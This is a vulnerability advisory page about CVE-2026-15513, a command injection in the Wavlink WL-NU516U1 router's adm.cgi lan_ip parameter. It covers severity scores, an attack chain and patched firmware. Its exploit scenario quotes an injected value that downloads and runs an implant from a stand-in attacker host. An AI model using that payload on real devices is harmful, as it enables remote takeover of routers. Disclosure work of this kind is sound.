Skip to main content

Wavlink WL-NU516U1 EUVDEUVD-2026-43254

| CVE-2026-15513 LOW
OS Command Injection (CWE-78)
2026-07-12 VulDB GHSA-f39c-wxvq-c7vx
2.1
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-accessible CGI endpoint requires low-privilege auth (PR:L); OS command injection on a router realistically yields full device control, warranting C:H/I:H/A:H.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Severity Changed
Jul 13, 2026 - 00:22 NVD
MEDIUM LOW
CVSS changed
Jul 13, 2026 - 00:22 NVD
5.3 (MEDIUM) 2.1 (LOW)
Analysis Generated
Jul 13, 2026 - 00:03 vuln.today

DescriptionCVE.org

A security flaw has been discovered in Wavlink WL-NU516U1 260515. This affects the function wlink_uci_set_value of the file /cgi-bin/adm.cgi. Performing a manipulation of the argument lan_ip results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.

AnalysisAI

OS command injection in the Wavlink WL-NU516U1 router's CGI web administration interface allows authenticated network attackers to execute arbitrary operating system commands by injecting shell metacharacters into the lan_ip parameter of the adm.cgi endpoint. The wlink_uci_set_value function passes attacker-controlled input unsanitized into OS-level commands, enabling full compromise of the underlying Linux-based router OS. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain low-privilege credentials or craft CSRF lure
Delivery
Send crafted HTTP POST to /cgi-bin/adm.cgi
Exploit
Inject shell metacharacters in lan_ip parameter
Execution
wlink_uci_set_value executes unsanitized OS command
Impact
Achieve arbitrary code execution on router OS

Vulnerability AssessmentAI

Exploitation Exploitation requires low-privilege authenticated access to the router's web administration interface, confirmed by the CVSS 4.0 PR:L metric. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor-supplied CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N) with exploit maturity E:P produces a score of 5.3 Medium. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privilege authenticated access to the Wavlink WL-NU516U1 admin panel sends a crafted POST request to /cgi-bin/adm.cgi with the lan_ip parameter containing shell injection characters (e.g., '192.168.1.1;wget http://attacker.com/implant -O /tmp/x;chmod +x /tmp/x;/tmp/x'). The wlink_uci_set_value function passes the unsanitized value directly into an OS command, executing the injected payload at the privilege level of the web server process. …
Remediation Upgrade to the vendor-patched firmware released June 22, 2026: WINSTAR_NU516U1-WO-A-2026-06-22-5ccde97-mt7628-squashfs-sysupgrade.bin, available directly from Wavlink at https://dl.wavlink.com/firmware/RD/WINSTAR_NU516U1-WO-A-2026-06-22-5ccde97-mt7628-squashfs-sysupgrade.bin. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-43254 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy